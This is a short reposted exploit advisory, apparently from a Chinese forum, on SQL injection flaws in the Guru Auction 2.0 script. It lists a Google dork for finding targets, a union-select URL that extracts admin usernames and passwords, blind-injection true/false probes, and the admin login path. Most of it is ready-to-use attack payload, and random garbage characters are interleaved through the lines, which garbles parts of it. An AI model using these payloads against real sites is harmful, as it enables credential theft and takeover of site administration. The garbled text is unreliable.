Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
0 i. T8 t+ l4 {
: v1 o. Y7 ?: a$ p% G" N3 Z作者 : v3n0m3 a+ Q7 J8 q6 D2 k* k! k k
应用 : Guru Auction 2.0
; q+ K2 S* x; w( |* tPrice : $493 Q2 ~$ D* @9 A7 c J4 V
Vendor : http://www.guruscript.com/
9 Q! Z, F, M) g" \$ V$ OGoogle Dork : inurl:subcat.php?cate_id=# c' G: f' b% q" j. V- H" f+ v! T8 O
# x0 z/ t& i3 c/ f% ^7 W( ^SQLi p0c:
4 A: d7 P' y; l( [6 s3 B~~~~~~~~~~& y. l* `1 L) W4 V7 U' C& G- m+ y5 x* C- c
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--5 o, F& J" V" e# F# h! p# s* e
" Z2 }& Z, e4 r0 D; g) ]4 _ & O5 z) R. H8 A# p
盲注 p0c:
P1 F; O$ V" I~~~~~~~~~~
0 p6 F9 k: i- k7 xhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true* q3 |6 N, f$ d' G7 o) W
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
: ?% ]! s2 p0 Z: j
1 |* ]' m0 h2 U% N6 A" D管理登录入口:5 ~6 _, m2 [ b/ b
~~~~~~~~~~
, \7 V2 v1 Y5 `# j& P! s0 qhttp://domain.tld/[path]/admin/
8 j( h6 N$ ~$ ^5 E9 f) p( J |
发表于 2012-12-31 09:24:05
收藏
支持
反对